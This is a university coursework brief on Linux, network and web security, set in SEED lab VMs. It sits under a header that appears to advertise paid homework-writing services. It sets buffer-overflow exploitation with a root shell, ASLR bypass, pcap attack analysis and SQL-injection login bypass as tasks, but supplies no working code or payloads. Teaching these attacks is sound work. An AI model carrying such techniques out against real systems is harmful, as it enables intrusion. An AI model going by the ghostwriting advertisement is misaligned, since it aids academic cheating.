IY2840 Coursework 2
web代做 | 代做report | security | Network | 代做network | shell作业 | 代做Python | lab作业 | 代做sql – 该题目是一个常规的sql的练习题目代写, 涉及了web/report/security/Network/network/shell/Python/sql等代写方面, 这个项目是lab代写的代写题目
Deadline:10:00am, 25th March 2022
This coursework is aimed to have you reflect on attacks and their mitigations. To get started, it is important that you review the lecture material and the course text. You are also expected to investigate online and/or library resources. We are not after essays in this coursework. We are after concise and succinct responses to each question, and suggest using bullet points and sketches where appropriate. Please make sure that any resource you use is suitably acknowledged as submissions are routinely checked for plagiarism.You are free to choose referencing style.
Total amount of marks in this coursework is 100 marks. This is a blind submission, and submissions are to be uploaded in PDF format on Moodle. The PDF file should contain all screenshots and source code requested. Specifics for these are indicated with blue underlined text. Do not include screenshots or sourcec code as files. This coursework counts for 20% of your grade on this module.
It is recommended that you use the SEED lab VMs to perform any tasks required for this coursework.
Question 1: Linux and Application Security
(a) An organisation is running a service to welcome its agents by printing a greeting message along with their name on their terminal screen. The developer in this organisation has created the C program (vulnerable-prog.c) to implement this service on the Ubuntu 32bit Linux server and you are asked to compile the program and manage its permissions in the operating system. i.[3 marks] Compile thevulnerable-prog.cfile usinggccbut you have to disable the smashing stack feature and enable the executable stack feature to be able to solve the subsequent questions. Then, run the program and provide a terminal screenshot of the outcome in your report. ii.[2 marks] The compiled program (file) has to be a root-owned Set-UID program. Provide the commands you would execute to achieve this. Show the program file permissions in a terminal screenshot in your report.
(b) A cyber security team in the organisation has discovered that the previous pro- gram (vulnerable-prog.c) is vulnerable to stack-based buffer overflow. As a pentester, you have been assigned to perform a penetration test to check if this vulnerability is exploitable in the system. You need to prepare the payload and exploit which will be used for spawning shell with the root permission. You have an exploit file (exloit.c) but this source-code file and is missing some statements. i.[15 marks] Fix theexploit.cfile by completing the missing parts of this file. Replace all instances of ? with the appropriate instructions or values to be able to compile and run the exploit program. Beforehand, you will
need to understand the buffer-overflow exploit program and how the shell code is injected to have such an successful attack [Hint: you may need to review the stack frame layout]. You may need to turn off the buffer- overflow countermeasure features while compiling and running the program (i.e. kernel.randomizevaspace = 0).Providetheamendedexploit.ccode withyourchangeshilightedinyourPDF. ii.[3 marks] Briefly explain and justify the entire program after fixing it and provide a screenshot of the execution output in your PDF.
(c) [12 marks]Briefly explain three countermeasures used in Linux to prevent stack-overflow attacks. Include in your answer how to enable them or how to check if they are already enabled.
(d) [15 marks]Turn on the ASLR countermeasure (i.e. kernel.randomizevaspace = 2) which is associated with the space address randomisation and run the ex- ploit program (the amendedexploit.cfile) again. Briefly explain the observa- tion and provide a screenshot in your report. Then, write a program to defeat this countermeasure. The program should also include a feature to display the cost of defeating using the metric of either the actual time (hh:mm:ss) or the number of runs. Briefly explain the scripts andprovideascreenshotoftheout- putinyourPDF.IncludeyoursourcecodeinyourPDF. Note: In order to answer this part, you should have already solved part b.
Question 2: network Security
(a) A security analyst team has thecapture1.pcap,capture2.pcapand capture3.pcapfiles which are network traffic captures of different network seg- ments. They need to identify potential attacks in these files. You are asked to assist them in their task by doing the following: i.[15 marks] Examine thesepcapfiles to determine the attacks within these files using Wireshark; keep in mind, each file has only one attack. Justify your answers including the description of those identified attacks and some screenshots of parts in the traffic (thepcapfiles) which refer to the attacks if necessary. ii.[5 marks] It is important for security analysts to understand suspicious activity in pcap files. This is often done by reproducing attacks. Setup and execute the attack identified incapture3.pcap. Provideascreenshotof networktrafficcausedbyyourattackinWireshark. Note: your pcapand the providedpcapfiles are not expected to be identical. You are not expected to reproduce the pcap content line by line, but it has to be the same attack.
Question 3: web Security
A company owns a website which is utilised for managing the employees records of the company. This website is run on a webserver using the Python code provided
(CW2WebServer.py). The webserver can be run on the SEEDLabs VM with the com- mandpython3 CW2WebServer.py. The webserver runs locally and can be accessed at localhost:8081. Be advised that when the webserver is restarted, it resets the database.In order to access the website resources, you need to have a login credentials. However, this website is vulnerable to sql injection (SQLi) and cross-site scripting (XSS) attacks. It is suggested you use two VMs; one as the web server and one as the attacker.
(a) [10 marks]How can an attacker bypass the website login without having access credentials? Assume there is an admin user for this system. Justify your answer showing at leastthreedifferent patterns of injections andprovidescreenshots inyourPDF.
SK/GS March 2022